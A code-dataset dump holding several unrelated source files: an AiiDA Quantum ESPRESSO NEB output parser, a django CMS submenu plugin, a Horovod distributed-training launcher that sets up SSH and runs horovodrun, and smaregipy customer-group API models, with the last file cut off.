for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| # -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options' | en | 0.760504 | # -*- coding: utf-8 -*- `Parser` implementation for the `NebCalculation` calculation job class. Parse the retrieved files of a completed `NebCalculation` into output nodes. Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files` which should contain the temporary retrieved files. # Note: this includes folders, but not the files they contain. # The stdout is required for parsing # Look for optional settings input node and potential 'parser_options' dictionary within it # Note that we look for both NEB and PW parser options under "inputs.settings.parser_options"; # we don't even have a namespace "inputs.pw.settings". # load the pw input parameters dictionary # load the neb input parameters dictionary # First parse the Neb output # TODO: why do we ignore raw_successful ? # Retrieve the number of images # Now parse the information from the individual pw calculations for the different images # for each image... # check if any of the known XML output file names are present, and parse the first that we find # this image is dealt with, so break the inner loop and go to the next image # otherwise, if none of the filenames we tried exists, exit with an error # look for pw output and parse it # Note: read() and not readlines() # Explicit information about k-points does not need to be queryable so we remove it from the parameters # Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead? # Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying # If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space # Add also PW warnings and errors to the neb output data, avoiding repetitions. # Symbols can be obtained simply from the last image # Load the original and interpolated energy profile along the minimum-energy path (mep) # Create an ArrayData with the energy profiles Return the key that contains the optional parser options in the `settings` input node. | 2.164714 | 2 |
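The `for ... else` construct in the XML-discovery loop of the NEB parser above is easy to misread: the `else` branch runs only when the loop finishes without hitting `break`, which is what lets the parser return its missing-XML exit code when none of the candidate filenames was retrieved. A minimal, self-contained sketch of the same pattern (the filenames and return strings below are illustrative, not taken from the parser):

# Standalone illustration of the for/else lookup pattern used by the parser above.
KNOWN_XML_FILENAMES = ['data-file-schema.xml', 'data-file.xml']  # illustrative names

def locate_xml(retrieved_files):
    for xml_filename in KNOWN_XML_FILENAMES:
        if xml_filename in retrieved_files:
            found = xml_filename
            break  # first known filename wins; the else branch is skipped
    else:
        # reached only if the loop never executed `break`
        return 'ERROR_MISSING_XML_FILE'
    return f'would parse {found}'

print(locate_xml(['pwscf.save', 'data-file-schema.xml']))  # would parse data-file-schema.xml
print(locate_xml(['PW.out']))                              # ERROR_MISSING_XML_FILE

The advantage of for/else here is that no sentinel flag is needed to remember whether a match occurred.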
foundation/djangocms_submenu/cms_plugins.py | Mindelirium/foundation | 0 | 9193 | <reponame>Mindelirium/foundation
from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin)
| from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin) | none | 1 | 1.601943 | 2 |
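A common next step for a plugin like the one above is overriding render() to add template context; a hedged sketch follows (it assumes django CMS is installed, and the extra "levels" context key is purely illustrative, not part of the original plugin):

# Sketch only: a variant of the plugin above that injects extra template context.
# Assumes django CMS is installed; the "levels" value is illustrative.
from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin


class SubmenuWithDepthPlugin(CMSPluginBase):
    model = CMSPlugin
    name = _("Submenu (with depth)")
    render_template = "cms/plugins/submenu.html"

    def render(self, context, instance, placeholder):
        context = super().render(context, instance, placeholder)
        context["levels"] = 2  # illustrative: how many menu levels the template should show
        return context


plugin_pool.register_plugin(SubmenuWithDepthPlugin)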
|
training/horovod/base/horovod_wrapper.py | thehardikv/ai-platform-samples | 418 | 9194 | <reponame>thehardikv/ai-platform-samples
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
  max_num_retries = int(os.environ.get("NUM_HOROVOD_RETRIES", 1))
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
  max_num_retries = int(os.environ.get("NUM_HOROVOD_RETRIES", 1))
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main() | en | 0.909135 | Indicates an action took too long. # This is imported here so that we don't load tensorflow in the parent # process. Once the sub-process exits, it releases its allocated GPU memory. Returns the number of GPUs on the machine. Parses environment config and returns a list of hosts as well as the role. Returns: An EnvironmentConfig. # Retry in 1 second. # Wait 10 seconds for the local server to start. # If there are no GPUs, we can just run single process per machine. | 2.479089 | 2 |
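A small, hypothetical exercise of parse_environment_config above with a representative AI Platform TF_CONFIG value (the horovod_wrapper module name, host names, and job id are assumptions for illustration):

# Hypothetical usage sketch: feed a representative TF_CONFIG string to
# parse_environment_config and inspect the resulting EnvironmentConfig.
import json
import horovod_wrapper  # assumed module name for the wrapper above

tf_config = {
    "cluster": {
        "master": ["cmle-training-master-0:2222"],   # illustrative host names
        "worker": ["cmle-training-worker-0:2222",
                   "cmle-training-worker-1:2222"],
    },
    "task": {"type": "master", "index": 0},
}

env_config = horovod_wrapper.parse_environment_config(json.dumps(tf_config), "job-123")
print(env_config.is_chief)          # True: the master task is treated as chief
print(env_config.pools["chief"])    # ['cmle-training-master-0']
print(env_config.pools["worker"])   # the two worker hosts
print(env_config.port)              # 2222, taken from the host:port entries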
smaregipy/pos/customer_groups.py | shabaraba/SmaregiPy | 0 | 9195 | import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
客層セクションの更新を行います。
put処理のため、saveメソッドをオーバーライド
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
